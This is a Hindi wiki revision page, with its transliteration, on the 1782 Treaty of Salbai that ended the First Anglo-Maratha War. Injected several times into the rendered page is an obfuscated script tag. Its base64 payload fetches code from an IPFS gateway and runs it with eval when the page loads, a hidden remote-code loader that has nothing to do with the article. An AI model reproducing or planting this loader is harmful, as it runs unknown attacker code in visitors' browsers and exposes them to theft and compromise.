Difference between revisions of "सालबाई की सन्धि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(7 intermediate revisions by 3 users not shown)
Line 1: Line 1:
'''सालबाई की सन्धि''', मई 1782 ई. में [[ईस्ट इण्डिया कम्पनी]] और [[महादजी शिन्दे]] के बीच हुई। फ़रवरी 1783 ई. में [[पेशवा]] की सरकार ने इसकी पुष्टि कर दी। इसके फलस्वरूप 1775 ई. से चला आ रहा प्रथम मराठा युद्ध समाप्त हो गया। सन्धि की शर्तों के अनुसार [[साष्टी]] टापू [[अंग्रेज़|अंग्रेज़ों]] के अधिकार में ही रहा, परन्तु उन्होंने [[राघोवा]] का पक्ष लेना छोड़ दिया और [[मराठा]] सरकार ने इसे पेंशन देना स्वीकार कर लिया। अंग्रेज़ों ने [[माधवराव नारायण]] को पेशवा मान लिया और [[यमुना नदी]] के पश्चिम का समस्त भू-भाग महादजी शिन्दे को लौटा दिया। अंग्रेज़ों और मराठों में यह सन्धि 20 वर्षों तक शान्तिपूर्वक चलती रही, पर इससे अंग्रेज़ों को ही विशेष लाभ हुआ; क्योंकि अब उन्हें [[टीपू सुल्तान]] जैसे अन्य शत्रुओं से निश्चिन्तता पूर्वक निपटने तथा अपनी शक्ति और स्थिति को और भी मजबूत करने का अवसर मिल गया।  
+
*'''सालबाई की सन्धि''', [[मई]] 1782 ई. में [[ईस्ट इण्डिया कम्पनी]] और [[महादजी शिन्दे]] के बीच हुई थी।
 +
*[[फ़रवरी]] 1783 ई. में [[पेशवा]] की सरकार ने इसकी पुष्टि कर दी थी।
 +
*इसके फलस्वरूप 1775 ई. से चला आ रहा [[आंग्ल-मराठा युद्ध प्रथम|प्रथम मराठा युद्ध]] समाप्त हो गया।
 +
*सन्धि की शर्तों के अनुसार [[साष्टी|साष्टी टापू]] [[अंग्रेज़|अंग्रेज़ों]] के अधिकार में ही रहा।
 +
*अंग्रेज़ों ने [[राघोवा]] का पक्ष लेना छोड़ दिया और मराठा सरकार ने इसे पेंशन देना स्वीकार कर लिया।
 +
*अंग्रेज़ों ने [[माधवराव नारायण]] को [[पेशवा]] मान लिया और [[यमुना नदी]] के पश्चिम का समस्त भू-भाग महादजी शिन्दे को लौटा दिया।
 +
*अंग्रेज़ों और मराठों में यह सन्धि 20 [[वर्ष|वर्षों]] तक शान्तिपूर्वक चलती रही।
 +
*इस सन्धि से सर्वाधिक लाभ अंग्रेज़ों को ही प्राप्त हुआ; क्योंकि अब उन्हें [[टीपू सुल्तान]] जैसे अन्य शत्रुओं से निश्चिन्तता पूर्वक निपटने तथा अपनी शक्ति और स्थिति को और भी मज़बूत करने का अवसर मिल गया।
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 9: Line 16:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
(पुस्तक 'भारतीय इतिहास कोश') पृष्ठ संख्या-469
+
{{cite book | last = भट्टाचार्य| first = सच्चिदानन्द | title = भारतीय इतिहास कोश | edition = द्वितीय संस्करण-1989| publisher = उत्तर प्रदेश हिन्दी संस्थान| location =  भारत डिस्कवरी पुस्तकालय| language =  हिन्दी| pages = 469 | chapter =}}
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{युद्ध सन्धियाँ}}
 
{{औपनिवेशिक काल}}
 
{{औपनिवेशिक काल}}
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
 
[[Category:औपनिवेशिक काल]]
 
[[Category:औपनिवेशिक काल]]
 
__INDEX__
 
__INDEX__

Latest revision as of 06:31, 21 April 2012

  • salabaee ki sandhi, mee 1782 ee. mean eest indiya kampani aur mahadaji shinde ke bich huee thi.
  • faravari 1783 ee. mean peshava ki sarakar ne isaki pushti kar di thi.
  • isake phalasvaroop 1775 ee. se chala a raha pratham maratha yuddh samapt ho gaya.
  • sandhi ki shartoan ke anusar sashti tapoo aangrezoan ke adhikar mean hi raha.
  • aangrezoan ne raghova ka paksh lena chho d diya aur maratha sarakar ne ise peanshan dena svikar kar liya.
  • aangrezoan ne madhavarav narayan ko peshava man liya aur yamuna nadi ke pashchim ka samast bhoo-bhag mahadaji shinde ko lauta diya.
  • aangrezoan aur marathoan mean yah sandhi 20 varshoan tak shantipoorvak chalati rahi.
  • is sandhi se sarvadhik labh aangrezoan ko hi prapt hua; kyoanki ab unhean tipoo sultan jaise any shatruoan se nishchintata poorvak nipatane tatha apani shakti aur sthiti ko aur bhi mazaboot karane ka avasar mil gaya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bhattachary, sachchidanand bharatiy itihas kosh, dvitiy sanskaran-1989 (hindi), bharat diskavari pustakalay: uttar pradesh hindi sansthan, 469.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>